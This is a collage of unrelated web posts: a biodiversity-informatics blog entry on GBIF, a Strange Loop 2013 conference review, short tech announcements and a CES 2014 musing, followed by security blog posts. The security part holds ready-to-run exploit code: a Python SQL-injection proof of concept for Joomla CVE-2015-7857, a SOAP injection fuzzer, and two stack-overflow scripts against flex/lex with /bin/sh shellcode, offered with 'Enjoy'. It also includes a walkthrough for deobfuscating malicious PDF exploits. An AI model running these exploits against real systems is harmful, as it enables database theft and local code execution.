This strikes me as hyperbole. "They disenfranchise systematists who are by necessity consensus-breakers". Really? Having backbones in no way prevents people doing systematic research, challenging existing classifications, or developing new ones (which, if they are any good, will become the new consensus).

We suggest that aggregators must either author these classification theories in the same ways that experts author systematic monographs, or stop generating and imposing them onto incoming data sources. The former strategy is likely more viable in the short term, but the latter is the best long-term model for accrediting individual expert contributions. Instead of creating hierarchies they would rather not 'own' anyway, aggregators would merely provide services and incentives for ingesting, citing, and aligning expert-sourced taxonomies (Franz et al. 2016a).

Backbones are authored in the sense that they are the product of people and code. GBIF's is pretty transparent (code and some data on github, complete with a list of problems). Playing Devil's advocate, maybe the problem here is the notion of authorship. If you read a paper with 100's of authors, why does that give you any greater sense of accountability? Is each author going to accept responsibility for (or be able to talk cogently about) every aspect of that paper? If aggregators such as GBIF and GenBank didn't provide a single, simple way to taxonomically browse the data I'd expect it would be the first thing users would complain about. There are multiple communities GBIF must support, including users who care not at all about the details of classification and phylogeny.

Having said that, obviously these backbone classifications are often problematic and typically lag behind current phylogenetic research. And I accept that they can impose a certain view on how you can query data. GenBank for a long time did not recognise the Ecdysozoa (nematodes plus arthropods) despite the evidence for that group being almost entirely molecular. Some of my research has been inspired by the problem of customising a backbone classification to better reflect more modern views (doi:10.1186/1471-2105-6-208).

If handling multiple classifications is an obstacle to people using or contributing data to GBIF, then that is clearly something that deserves attention. I'm a little sceptical, in that I think this is similar to the issue of being able to look at multiple versions of a document or GenBank sequence. Everyone says it's important to have; I suspect very few people ever use that functionality. But a way forward might be to construct a meaningful example (in other words a live demo, not a diagram with a few plant varieties).

Ways forward

We view this diagnosis as a call to action for both the systematics and the aggregator communities to reengage with each other. For instance, the leadership constellation and informatics research agenda of entities such as GBIF or Biodiversity Information Standards (TDWG 2017) should strongly coincide with the mission to promote early-stage systematist careers. That this is not the case now is unfortunate for aggregators, who are thereby losing credibility. It is also a failure of the systematics community to advocate effectively for its role in the biodiversity informatics domain. Shifting the power balance back to experts is therefore a shared interest.

Having vented, let me step back a little and try and extract what I think the key issue is here. Issues such as error correction, backbones, multiple classifications are important, but I guess the real issue here is the relationship between experts such as taxonomists and systematists, and large-scale aggregators (note that GBIF serves a community that is bigger than just these researchers). Franz and Sterner write:

...aggregators also systematically compromise established conventions of sharing and recognizing taxonomic work. Taxonomic experts play a critical role in licensing the formation of high-quality biodiversity data packages. Systems of accountability that undermine or downplay this role are bound to lower both expert participation and trust in the aggregation process.

I think this is perhaps the key point. Currently aggregation tends to aggregate data and not provenance. Pretty much every taxonomic name has at one point or other been published by somebody. For various reasons (including the crappy way most nomenclature databases cite the scientific literature), by the time these names are assembled into a classification by GBIF the names have virtually no connection to the primary literature, which also means that who contributed the research that led to that name being minted (and the research itself) is lost. Arguably GBIF is missing an opportunity to make taxonomic and phylogenetic research more visible and discoverable (I'd argue this is a better approach than Quixotic efforts to get all biologists to always cite the primary taxonomic literature).
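As a small illustration (again just a sketch against the public GBIF v1 species API, with an illustrative backbone key), you can ask a backbone name usage where its name was published; how often that field actually links back to citable, discoverable literature is precisely the issue:

import json
import urllib2  # Python 2

# 2435099 is (I believe) the GBIF backbone usageKey for Puma concolor;
# treat it as an illustrative value, obtainable via the species/match call above
usage = json.load(urllib2.urlopen("https://api.gbif.org/v1/species/2435099"))
print usage.get("scientificName"), usage.get("authorship")
print usage.get("publishedIn")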

Franz and Sterner's article is a well-argued and sophisticated assessment of a relationship that isn't working the way it could. But to talk in terms of "power balance" strikes me as miscasting the debate. Would it not be better to try and think about aligning goals (assuming that is possible)? What do experts want to achieve? What do they need to achieve those goals? Is it things such as access to specimens, data, literature, sequences? Visibility for their research? Demonstrable impact? Credit? What are the impediments? What, if anything, can GBIF and other aggregators do to help? In what way can facilitating the work of experts help GBIF?

In my own "early-stage systematist career" I had a conversation with Mark Hafner about the Louisiana State University Museum providing tissue samples for molecular sequencing, essentially a "project in a box". Although Mark was complaining about the lack of credit for this (a familiar theme), the thing which struck me was how wonderful it would be to have such a service - here's everything you need to do your work, go do some science. What if GBIF could do the same? Are you interested in this taxonomic group? Well, here's the complete sum of what we know so far. Specimens, literature, DNA sequences, taxonomic names, the works. Wouldn't that be useful?

Franz and Sterner call for "both the systematics and the aggregator communities to reengage with each other". I would echo this. I think that the sometimes dysfunctional relationship between experts and aggregators is partly due to the failure to build a community of researchers around GBIF and its activities. The focus of GBIF's relationship with the scientific community has been to have a committee of advisers, which is a rather traditional and limited approach ("you're a scientist, tell us what scientists want"). It might be better served if it provided a forum for researchers to interact with GBIF, data providers, and each other.

I started this blog (iPhylo) years ago to vent my frustrations about TreeBASE. At the time I was fond of a quote from a philosopher of science that I was reading, to the effect that we only criticise those things that we care about. I take Franz and Sterner's article to indicate that they care about GBIF quite a bit ;). I'm looking forward to more critical discussion about how we can reconcile the needs of experts and aggregators as we seek to make global biodiversity data both open and useful.


          EPISODE82 - You (are) the change agent for driving cloud adoption in your b        
Join us to explore practical strategies to overcome cloud adoption challenges faced by traditional businesses. We will discuss planning a cloud proof of concept (PoC), cloud native application development, where to start with DevOps, and why hybrid cloud is the winning formula. Come find out how we'll equip you with a pragmatic approach towards starting your cloud journey - one step at a time.
          Eclipse Foundation announces expanded support for Eclipse Integration Platform        
Eclipse Foundation announced today new partnerships that strengthen the Eclipse Application Lifecycle Framework (ALF) Project and has made available for download of the new proof of concept code which will demo at EclipseCon 2006. The ALF Project, initiated by Serena Software in the spring of 2005, addresses the universal problem of integrating Application Lifecycle Management (ALM) technologies so that they provide full interoperability. Currently more than thirty vendors have pledged support for the ALF project and momentum continues. Recent additions to the list of those committing resources include AccuRev, PlanView and Viewtier.
          The Strange Loop 2013        

This was my second time at The Strange Loop. When I attended in 2011, I said that it was one of the best conferences I had ever attended, and I was disappointed that family plans meant I couldn't attend in 2012. That meant my expectations were high. The main hotel for the event was the beautiful DoubleTree Union Station, an historic castle-like building that was once an ornate train station. The conference itself was a short walk away at the Peabody Opera House. Alex Miller, organizer of The Strange Loop, Clojure/West, and Lambda Jam (new this year), likes to use interesting venues, to make the conferences extra special.

I'm providing a brief summary here of what sessions I attended, followed by some general commentary about the event. As I said last time, if you can only attend one conference a year, this should be the one.

  • Jenny Finkel - Machine Learning for Relevance and Serendipity. The conference kicked off with a keynote from one of Prismatic's engineering team talking about how they use machine learning to discover news and articles that you will want to read. She did a great job of explaining the concepts and outlining the machinery, along with some of the interesting problems they encountered and solved.
  • Maxime Chevalier-Boisvert - Fast and Dynamic. Maxime took us on a tour of dynamic programming languages through history and showed how many of the innovations from earlier languages are now staples of modern dynamic languages. One slide presented JavaScript's take on n + 1 for various interesting values of n, showing the stranger side of dynamic typing - a "WAT?" moment.
  • Matthias Broecheler - Graph Computing at Scale. Matthias opened his talk with an interesting exercise of asking the audience two fairly simple questions, as a way of illustrating the sort of problems we're good at solving (associative network based knowledge) and not so good at solving (a simple bit of math and history). He pointed out the hard question for us was a simple one for SQL, but the easy question for us would be a four-way join in SQL. Then he introduced graph databases and showed how associative network based questions can be easily answered and started to go deeper into how to achieve high performance at scale with such databases. His company produces Titan, a high scale, distributed graph database.
  • Over lunch, two students from Colombia told us about the Rails Girls initiative, designed to encourage more young women into the field of technology. This was the first conference they had presented at and English was not their native language so it must have been very nerve-wracking to stand up in front of 1,100 people - mostly straight white males - and get their message across. I'll have a bit more to say about this topic at the end.
  • Sarah Dutkiewicz - The History of Women in Technology. Sarah kicked off the afternoon with a keynote tour through some of the great innovations in technology, brought to us by women. She started with Ada Lovelace and her work with Charles Babbage on the difference engine, then looked at the team of women who worked on the ENIAC, several of whom went on to work on UNIVAC 1. Admiral Grace Hopper's work on Flow-Matic - part of the UNIVAC 1 project - and subsequent work on COBOL was highlighted next. Barbara Liskov (the L in SOLID) was also covered in depth, along with several others. These are good role models that we can use to encourage more diversity in our field - and to whom we all owe a debt of gratitude for going against the flow and making their mark.
  • Evan Czaplicki - Functional Reactive Programming in Elm. This talk's description had caught my eye a while before the conference, enough so that I downloaded Elm and experimented with it, building it from source on both my Mac desktop and my Windows laptop, during the prerelease cycle of what became the 0.9 and 0.9.0.2 versions. Elm grew out of Evan's desire to express graphics and animation in a purely functional style and has become an interesting language for building highly interactive browser-based applications. Elm is strongly typed and heavily inspired by Haskell, with an excellent abstraction for values that change over time (such as mouse position, keyboard input, and time itself). After a very brief background to Elm, Evan live coded the physics and interaction for a Mario platform game with a lot of humor (in just 40 lines of Elm!). He also showed how code updates could be hot-swapped into the game while it was running. A great presentation and very entertaining!
  • Keith Adams - Taking PHP Seriously. Like CFML, PHP gets a lot of flak for being a hot mess of a language. Keith showed us that, whilst the criticisms are pretty much all true, PHP can make good programmers very productive and enable some of the world's most popular web software. Modern PHP has traits (borrowed from Scala), closures, generators / yield (inspired by Python and developed by Facebook). Facebook's high performance "HipHop VM" runs all of their PHP code and is open source and available to all. Facebook have also developed a gradual type checking system for PHP, called Hack, which is about to be made available as open source. It was very interesting to hear about the pros and cons of this old warhorse of a language from the people who are pushing it the furthest on the web.
  • Chiu-Ki Chan - Bust the Android Fragmentation Myth. Chiu-Ki was formerly a mobile app developer at Google and now runs her own company building mobile apps. She walked us through numerous best practices for creating a write-once, run-anywhere Android application, with a focus on various declarative techniques for dealing with the many screen sizes, layouts and resolutions that are out there. It was interesting to see a Java + XML approach that reminded me very much of Apache Flex (formerly Adobe Flex). At the end, someone asked her whether similar techniques could be applied to iOS app development and she observed that until very recently, all iOS devices had the same aspect ratio and same screen density so, with auto-layout functionality in iOS 6, it really wasn't much of an issue over in Apple-land.
  • Alissa Pajer - Category Theory: An Abstraction for Everything. In 2011, the joke was that we got category theory for breakfast in the opening keynote. This year I took it on by choice in the late afternoon of the first day! Alissa's talk was very interesting, using Scala's type system as one of the illustrations of categories, functors, and morphisms to show how we can use abstractions to apply knowledge of one type of problem to other problems that we might not recognize as being similar, without category theory. Like monads, this stuff is hard to internalize, and it can take many, many presentations, papers, and a lot of reading around the subject, but the abstractions are very powerful and, ultimately, useful.
  • Jen Myers - Making Software Development Make Sense For Everyone. Closing out day one was a keynote by Jen Myers, primarily known as a designer and front end developer, who strives to make the software process more approachable and more understandable for people. Her talk was a call for us all to help remove some of the mysticism around our work and encourage more people to get involved - as well as to encourage people in the software industry to grow and mature in how we interact. As she pointed out, we don't really want our industry to be viewed through the lens of movies like "The Social Network", which makes developers look like assholes!
  • Martin Odersky - The Trouble with Types. The creator of Scala started day two by walking us through some of the commonly perceived pros and cons of both static typing and dynamic typing. He talked about what constitutes good design - discovered, rather than invented - and then presented his latest work on type systems: DOT and the Dotty programming language. This collapses some of the complexities of parameterized types (from functional programming) down onto a more object-oriented type system, with types as abstract members of classes. Compared to Scala (which has both functional and object-oriented types), this provides a substantial simplification without losing any of the expressiveness, and could be folded into "Scala.Next" if they can make it compatible enough. This would help remove one of the major complaints against Scala: the complexity of its type system!
  • Mridula Jayaraman - How Developers Treat Ovarian Cancer. I missed Ola Bini's talk on this topic at a previous conference so it was great to hear one of his teammates provide a case study on this fascinating project. ThoughtWorks worked with the Clearity Foundation and Annai Systems - a genomics startup - to help gather and analyze research data, and to automate the process of providing treatment recommendations for women with ovarian cancer. She went over the architecture of the system and (huge!) scale of the data, as well as many of the problems they faced with how "dirty" and unstructured the data was. They used JRuby for parsing the various input data and Clojure for their DSLs, interacting with graph databases, the recommendation engine and the back end of the web application they built.
  • Crista Lopes - Exercises in Style. Noting that art students are taught various styles of art, along with analysis of those styles, and the rules and guidelines (or constraints) of those styles, Crista observed that we have no similar framework for teaching programming styles. The Wikipedia article on programming style barely goes beyond code layout - despite referencing Kernighan's "Elements of Programming Style"! She is writing a book called "Exercises in Programming Style", due in Spring 2014 that should showcase 33 styles of programming. She then showed us a concordance program (word frequencies) in Python, written in nine different styles. The code walkthrough got a little rushed at the end but it was interesting to see the same problem solved in so many different ways. It should be a good book and it will be educational for many developers who've only been exposed to one "house" style in the company where they work.
  • Martha Girdler - The Javascript Interpreter, Interpreted. Martha walked us through the basics of variable lookups and execution contexts in JavaScript, explaining variable hoisting, scope lookup (in the absence of block scope) and the foibles of "this". It was a short and somewhat basic preso that many attendees had hoped would be much longer and more in depth. I think it was the only disappointing session I attended, and only because of the lack of more material.
  • David Pollak - Getting Pushy. David is the creator of the Lift web framework in Scala that takes a very thorough approach to security and network fallibility around browser/server communication. He covered that experience to set the scene for the work he is now doing in the Clojure community, developing a lightweight push-based web framework called Plugh that leverages several well-known Clojure libraries to provide a seamless, front-to-back solution in Clojure(Script), without callbacks (thanks to core.async). Key to his work is the way he has enabled serialization of core.async "channels" so that they can be sent over the wire between the client and the server. He also showed how he has enabled live evaluation of ClojureScript from the client - with a demo of a spreadsheet-like web app that you program in ClojureScript (which is round-tripped to the server to be compiled to JavaScript, which is then evaluated on the client!).
  • Leo Meyerovich - Thinking DSLs for Massive Visualization. I had actually planned to attend Samantha John's presentation on Hopscotch, a visual programming system used to teach children to program, but it was completely full! Leo's talk was in the main theater so there was still room in the balcony and it was an excellent talk, covering program synthesis and parallel execution of JavaScript (through a browser plugin that offloads execution of JavaScript to a specialized VM that runs on the GPU). The data visualization engine his team has built has a declarative DSL for layout, and uses program synthesis to generate parallel JS for layout, regex for data extraction, and SQL for data analysis. The performance of the system was three orders of magnitude faster than a traditional approach!
  • Chris Granger - Finding a Way Out. Some of you may have been following Chris's work on LightTable, an IDE that provides live code execution "in place" to give instant feedback as you develop software. If you're doing JavaScript, Python, or Clojure(Script), it's worth checking out. This talk was more inspirational that product-related (although he did show off a proof of concept of some of the ideas, toward the end). In thinking about "How do we make programming better?" he said there are three fundamental problems with programming today: it is unobservable, indirect, and incidentally complex. As an example, consider person.walk(), a fairly typical object-oriented construct, where it's impossible to see what is going on with data behind the scenes (what side effects does it have? which classes implement walk()?). We translate from the problem domain to symbols and add abstractions and indirections. We have to deal with infrastructure and manage the passage of time and the complexities of concurrency. He challenged us that programming is primarily about transforming data and posited a programming workflow where we can see our data and interactively transform it, capturing the process from end to end so we can replay it forwards and backwards, making it directly observable and only as complex as the transformation workflow itself. It's an interesting vision, and some people are starting to work on languages and tools that help move us in that direction - including Chris with LightTable and Evan with Elm's live code editor - but we have a long way to go to get out of the "tar pit".
  • Douglas Hofstadter, David Stutz, a brass quintet, actors, and aerialists - Strange Loops. The two-part finale to the conference began with the author of "Gödel, Escher, and Bach" and "I am a Strange Loop" talking about the concepts in his books, challenging our idea of perception and self and consciousness. After a thought-provoking dose of philosophy, David Stutz and his troope took to the stage to act out a circus-themed musical piece inspired by Hofstadter's works. In addition to the live quintet, Stutz used Emacs and Clojure to provide visual, musical, and programmatic accompaniment. It was a truly "Strange" performance but somehow very fitting for a conference that has a history of pushing the edges of our thinking!

Does anything unusual jump out at you from the above session listing? Think about the average technical conference you attend. Who are the speakers? Alex Miller and the team behind The Strange Loop made a special effort this year to reach out beyond the "straight white male" speaker community and solicit submissions from further afield. I had selected most of my schedule, based on topic descriptions, before it dawned on me just how many of the speakers were women: over half of the sessions I attended! Since I didn't recognize the vast majority of speaker names on the schedule - so many of them were from outside the specific technical community I inhabit - I wasn't really paying any attention to the names when I was reading the descriptions. The content was excellent, covering the broad spectrum I was expecting, based on my experience in 2011, with a lot of challenging and fascinating material, so the conference was a terrific success in that respect. That so many women in technology were represented on stage was an unexpected but very pleasant surprise and it should provide an inspiration to other technology conferences to reach beyond their normal pool of speakers too. I hope more conferences will follow suit and try to address the lack of diversity we seem to take for granted!

I already mentioned the great venues - both the hotel and the conference location - but I also want to call out the party organized at the St Louis City Museum for part of the overall "wonder" of the experience that was The Strange Loop 2013. The City Museum defies description. It is a work of industrial art, full of tunnels and climbing structures, with a surprise around every corner. Three local breweries provided good beer, and there was a delicious range of somewhat unusual hot snacks available (bacon-wrapped pineapple is genius - that and the mini pretzel bacon cheeseburgers were my two favorites). It was quiet enough on the upper floors to talk tech or chill out, while Moon Hooch entertained loudly downstairs, and the outdoor climbing structures provided physical entertainment for the adventurous with a head for heights (not me: my vertigo kept me on the first two stories!).

In summary then, the "must attend" conference of the year, as before! Kudos to Alex Miller and his team!


          Joomla CVE-2015-7857 writeup         
(I wrote this as a 'note' on 14.12.2015, but since all the information is already public,
below you will find a proof of concept and a little write-up for the vulnerability described in this CVE.)



A few weeks ago Asaf Orpani found a SQL injection vulnerability in the 'latest' (in those days) Joomla CMS.
According to the CVE, the vulnerable versions range from 3.2 to 3.4.

Because I was involved in other projects, I found information about this CVE just a few days ago... When I saw that Asaf published more details about possible exploitation (than the CVE), I was wondering
if I would be able to write a small proof-of-concept to use later during other projects.

So, let's get to work!

Trustwave SpiderLabs mentioned that:


„CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.”

Cool. ;]

I think that "all technical details"  you will find described at the SpiderLabs Blog so there is no point to copy/paste it here again.

What we will actually need is just one screen from Trustwave's Blog: the one with the GET request.
We can observe that 'for exploitation' we can create just a simple 'one liner' GET. We will use
python for this. ;)

Let's write a small web client (GET request, based on the urllib2 library).
Our goal is: type an IP/hostname, hit enter, and get the DB version. ;)

This case will be a little different from the one described on SpiderLabs' Blog, because we don't want to wait for an admin to log in. We don't need a logged-in admin on the webapp/server during our pentest. ;P

Our proof-of-concept payload will use a simple "version()" injected into the SQL query
when a link with the 'list[select]' parameter is visited. On my localhost server we
will use LAMP (on Debian 8) and Joomla 3.4.4.

By the way, it will be good to know whether the Joomla installation (found in our 'testing scope') is vulnerable or not.

I assume that you have already installed Joomla (3.4.4).
If not, unzip it and find out where we can find (if any) information
about the version:

$ grep --color -nr -e 3.4.4 ./

Below you will find a sample screen presenting strings containing 'version':



Now, we see a nice XML file containing the version of Joomla installed on my box.
(It's good to mention here that this file can be grabbed by anyone. You don't need
any credentials.)

So let's add a few lines to our 'one liner' python script to check if the tested Joomla
is vulnerable or not. Sample code would look like this:
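(A rough sketch of my own version - the manifest path /administrator/manifests/files/joomla.xml and the regex are assumptions for a default Joomla 3.4.4 install, so adjust as needed:)

#!/usr/bin/env python
# minimal sketch (Python 2) - check the Joomla version before trying anything else
import re
import sys
import urllib2

target = sys.argv[1]   # e.g. http://192.168.56.101/joomla

def version(host):
    # default Joomla installs ship this manifest world-readable (assumption)
    req = urllib2.urlopen(host + '/administrator/manifests/files/joomla.xml')
    found = re.search('<version>(.*?)</version>', req.read())
    if found:
        print '[+] Joomla version found:', found.group(1)

def sqli(host):
    pass   # we will fill this in below

version(target)
# sqli(target)   # commented out for now - we only want the version number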
 
As you can see, the sqli(host) function is now commented out in the code. We only
want to see the version number. (Checking if your Joomla installation has this file
is left as an exercise for the reader.)

Joomla 3... SQL Injection
I tried this poc against 3.2, 3.3 and 3.4.4 installed on my box and, to be honest,
I was able to use it only against 3.4. (If you want, let me know in the comments
against which version installed on your box this poc worked. Thanks! ;))


A modified version of this code is below:
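(Again a rough sketch rather than the exact code from my screenshots - the query string follows the public write-ups of CVE-2015-7857 (the com_contenthistory component) and relies on MySQL's duplicate-entry error being reflected in the response, so treat it as illustrative:)

#!/usr/bin/env python
# minimal sketch (Python 2) - error-based extraction of version() via list[select]
import re
import sys
import urllib
import urllib2

def sqli(host):
    # the injected SELECT abuses MySQL's "duplicate entry" error to leak version();
    # payload adapted from the public write-ups of this CVE
    inj = ("(select 1 from (select count(*),concat(version(),"
           "floor(rand(0)*2))x from information_schema.tables group by x)a)")
    payload = ("/index.php?option=com_contenthistory&view=history"
               "&list[ordering]=&item_id=1&type_id=1"
               "&list[select]=" + urllib.quote(inj))
    try:
        body = urllib2.urlopen(host + payload).read()
    except urllib2.HTTPError, e:
        body = e.read()   # Joomla may answer with a 500 error page
    # tweak the regex if the target HTML-encodes the error message
    found = re.search(r"Duplicate entry '(.*?)1' for key", body)
    if found:
        print '[+] version() says:', found.group(1)
    else:
        print '[-] no error-based leak - target is probably not vulnerable'

if __name__ == '__main__':
    sqli(sys.argv[1])   # e.g. python poc.py http://192.168.56.101/joomla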


Below is the screen of testing the vulnerable Joomla 3.4.4 installed on my localhost.
A simple poc to get the version of MySQL available on the server:
 


          [EN] SOAP testing        
During one of my last projects I needed to test some webservices.

I was wondering: if I can do it with Burp or by manual testing,
maybe I can also write some quick code in python...

And that's how I wrote soapee.py:



---<code>---

root@kali:~/code/soapee-v3# cat soapee3.py
#!/usr/bin/env python
# -------------------------------------
# soapee.py - SOAP fuzz - v0.2
# -------------------------------------
# 16.10.2015

import urllib2
import sys
import re
from bs4 import BeautifulSoup
import httplib
from urlparse import urlparse

target = sys.argv[1]


def sendNewReq(method):
  global soap_header
  print '[+] Sending new request to webapp...'
  toSend = open('./logs/clear-method-'+str(method)+'.txt','r').read()

  parsed = urlparse(target)
  server_addr = parsed.netloc
  service_action =  parsed.path

  body = toSend
  print '[+] Sending:'

  print '[+] Response:'

  headers = {"Content-type": "text/xml; charset=utf-8",
        "Accept": "text/plain",
        "SOAPAction" : '"' + str(soap_header) + '"'
        }

#  print '***********************************'
#  print 'headers: ', headers
#  print '***********************************'
  conn = httplib.HTTPConnection(server_addr)
  conn.request("POST", parsed.path, body, headers)
#  print body
  response = conn.getresponse()

  print '[+] Server said: ', response.status, response.reason
  data = response.read()

  logresp = open('./logs/resp-method-'+ method + '.txt','w')
  logresp.write(data)
  logresp.close()

  print '............start-resp...........................................'
  print data
  print '............stop-resp...........................................\n'


  print '[+] Finished. Next step...'
  print '[.] -----------------------------------------\n'

##

def prepareNewReq(method):
  print '[+] Preparing new request for method: '+str(method)

  fp = open('./logs/method-'+str(method)+'.txt','r')
  fp2 = open('./logs/fuzz-method-'+str(method)+'.txt','w')

  for line in fp:
    if line.find('SOAPAction') != -1:
      global soap_header
      soap_header = line
      soap_header = soap_header.split(" ")
      soap_header = soap_header[1].replace('"','')
      soap_header = soap_header.replace('\r\n','')
#     print soap_header

    newline = line.replace('<font class="value">','')
    newline2 = newline.replace('</font>','')

    newline3 = newline2.replace('string','";\'>')
    newline4 = newline3.replace('int','111111111*11111')
    newline5 = newline4.replace('length','1337')
    newline6 = newline5.replace('&lt;soap:','<soap:')
    newline7 = newline6.replace('&lt;/soap:','</soap:')
    newline8 = newline7.replace(' or ','or')

    fp2.write(newline8)

  print '[+] New request prepared.'

  fp2.close()
  print '[+] Clearing file...'
  linez = open('./logs/fuzz-method-'+str(method)+'.txt').readlines()
  open('./logs/clear-method-'+str(method)+'.txt','w').writelines(linez[6:])


  fp.close()
  fp2.close()
  sendNewReq(method)

##


# compose_link(method), get it, and save new req to file
def compose_link(method):
  methodLink = target + '?op='+ method
  print '[+] Getting: ', method

  fp = open('./logs/method-'+str(method)+'.txt','w')

  req = urllib2.urlopen(methodLink)
  page = req.read()
  soup = BeautifulSoup(page)

  for pre in soup.find('pre'):
    fp.write(str(pre))

  print '[+] Method body is saved to file for future analysis.'
  fp.close()

  prepareNewReq(method)

##

## main
def main():
  print '        _________________'
  print '        (*(( soapee ))*)'
  print '             ^^^^^^\n'

  url1 = urllib2.urlopen(target)
  page1 = url1.readlines()

  # get_links_to_methods
  print '[+] Looking for methods:\n------------------------'
  for href in page1:
    hr = re.compile('<a href="(.*)\.asmx\?op=(.*?)">') #InfoExpert.asmx?op=GetBodyList">GetBodyList</a>')
    found = re.search(hr,href)
    if found: # at this stage we need to create working link for each found method
      method = found.group(2)

      # found method get as URL for pre content to next request
      compose_link(method)



  # ...
  #     ... get example of each req
  #           ... change each str/int to fuzzval
  #     ... send modified req
  print '---------------------------\ndone.'

##



try:
  main()

except IndexError, e:
  print 'usage: ' + str(sys.argv[0]) + ' http://link/to/WebService.asmx\n'

root@kali:~/code/soapee-v3#

---</code>---
Also@pastebin;)
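
For reference, a typical run against a hypothetical host (any ASP.NET .asmx endpoint that lists its operations should do) looks like this:

---<code>---
root@kali:~/code/soapee-v3# python soapee3.py http://192.168.1.15/InfoExpert.asmx
---</code>---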



As you can see it's just a proof of concept (mostly to find some useful information disclosure bugs) but the skeleton can be used to prepare more advanced tools.

Maybe you will find it useful.

Enjoy ;)





          [EN] Flex 2.5.33 (2) 0days        
I was testing some old bugs in one old distro, and that's how I found a sigsegv in flex (2.5.33).

Below is the proof of concept:



---
#!/usr/bin/env python
# -------------------------
# 0day poc for flex 2.5.33
#

from subprocess import call

flex = '/usr/bin/flex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "A"*2165
ret = "\xc0\xfb\xff\xbf"

payload = nops + shellcode + ret
call([flex,payload])

print 'Done\n\n'
---


The second one is pretty similar (this time for the /usr/bin/lex binary):
---

#!/usr/bin/env python
# -------------------------
# 0day poc for lex 2.5.33
# 28.04.2015
#

from subprocess import call

lex = '/usr/bin/lex'
shellcode =  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
nops = "\x90"*2165
ret = "\x80\xfb\xff\xbf"

payload = nops + shellcode + ret
call([lex,payload])

print 'Done\n\n'
---


Enjoy ;)


o/

          [EN] Analysing malicious PDF - part 2        
This time we will check 2 PDFs (because I decided that it will be more fun than just posting about one ;)). Besides that, those 2 files contain different methods for delivering the payload, so we will check both of them.



To do:
1. find malicious file
2. find JS if there is any (or other objects possibly used for the attack)
3. decode it - to get as much info as possible.
4. if not finished - go to step 2.

The two files to analyse can be found on the previously mentioned(1) Contagio's Blog.

First case:






Let's check the object(s) containing JS:

PDF> object 7 > C:\1.txt 

...will save it to a file. Open this file in your favorite editor and 'beautify' the code a little bit:


 Ok, so now we will get the idea...


Now we know how this code is obfuscated. Let's prepare a "decoder" :)





Ok good, the printable version should now contain the decoded string. Checking:


hm... Almost good, but almost is not enough ;) We need to rewrite this for() loop.

Better! Now we need to unescape() the code in a safe way. Change eval() to document.write() again:
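
(Alternatively, if you prefer to do the unescape() step outside the browser, a small helper like the one below also works - this is my own sketch of what unescape() effectively feeds to the exploit, not part of the original workflow:)

#!/usr/bin/env python
# decode %uXXXX / %XX sequences into raw bytes, the way shellcode analysts
# usually want them (each %uXXXX becomes two little-endian bytes)
import re
import struct

def js_unescape(s):
    s = re.sub(r'%u([0-9a-fA-F]{4})',
               lambda m: struct.pack('<H', int(m.group(1), 16)), s)
    s = re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)
    return s

print repr(js_unescape('%u9090%u9090%41%42'))   # -> '\x90\x90\x90\x90AB'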





And now we can see that this is (again, commented ;)) code with an exploit for Adobe Acrobat.

Beauty again:





Good. Now, after a few minutes, we can get the original exploit:



That's all for case one. :)


Second case:

A new sample from Contagio's Blog, and again, as a "first stage of checking",
we will use peepdf.py to analyse it:





Ok, now we can see some object(s) also containing JS code. Let's check this JS code:




In object 13 we will find more JS, so we need to extract it to a TXT file again to beautify or analyse it later. Let's do it (PDF> object 13 > c:\yourFile.txt). Below is the screen from this action:




We can see that this code needs to be sanitized, so we will do it in Malzilla (the unicode decoder in "Misc decoders"):




Malzilla again in action:



After decoding the rest in Burp's Decoder, we can find the real content of this exploit:




Checking online for resources like that, we can easily find proof of concept code, here or here for example.

With those two cases explained, you should now be able to check whether your spam contains some "interesting" PDF files ;)

(* Remember ;)
if you can't check it, you can always send it to me: zipped with password 'infected'.)


Cheers ;)

o/








          Sr. Automation Tester - SPAR INFORMATION SYSTEMS - Bentonville, AR        
Experience in developing various proof of concepts on new technologies and work with SME’s to develop recommendations that align with Client strategy....
From Indeed - Fri, 21 Jul 2017 14:29:30 GMT
          The State of Technology 2014        
It's been a while since I've talked about technology. But with CES 2014 behind us, I think it's time to ruminate on a few things that we've learned over the last few years. I wouldn't compare myself to the greats Isaac Asimov, Arthur C. Clarke or Jerry Pournelle, but I think it's useful sometimes to look at the trends and see where we're going technology-wise.

I've given the reflections from this year's conference some time to trickle down into my brain, and here's what I've come up with.

Once upon a time, 3D TVs seemed to be all the rage. I think some people actually fell for that colossal joke. And for them, I'm sorry. I guess they were too young to remember the Red/Blue 3D from the 1980s.... In any case, there didn't seem to be any mention of this ludicrous attempt at making the movie-watching experience more immersive this year. Don't fret, though, there were plenty of other ridiculous technologies being touted at the show.

Wearables

The "Quantifiable Self" is a term I heard in reference to technology that has been "adapted" (the term seemingly used loosely) to be worn on the wrist, hip, etcetera. I can see the facility of fitness trackers and whatnot. There is a certain benefit to try and catalogue all of our physical activity (not just running and walking, but sleeping, etc.), but I think no one has really tied it up as yet. 

The Curve

Curved screens, most notably on large-format displays (or TVs, as we know them in everyday life), seemed to be the "3D" of this year's show. Quite honestly, as described, I fail to see the utility of such a thing. I guess they're probably trying to achieve something like the "sweet spot" you aim for when listening to audio, unless it's to try and provide the wraparound IMAX sort of experience on a much smaller scale. There's even a TV, reportedly, which transforms from slightly curved to flat and vice versa at the touch of a button. Allegedly, it will cost around $80,000, so it's probably not going to be a widely adopted product and is more of a proof of concept that the insanely wealthy can waste money on. If you don't have one of those fancy transforming screens, though, and you have one of the fixed-curve variety, anyone sitting to the side will see a distorted view, not to mention that the effect is lessened the further away one gets (which is necessary as these TVs balloon to greater and greater sizes). In Urban Dictionary, there's a picture of this segment of CES 2014 under "Gimmick".

UHD

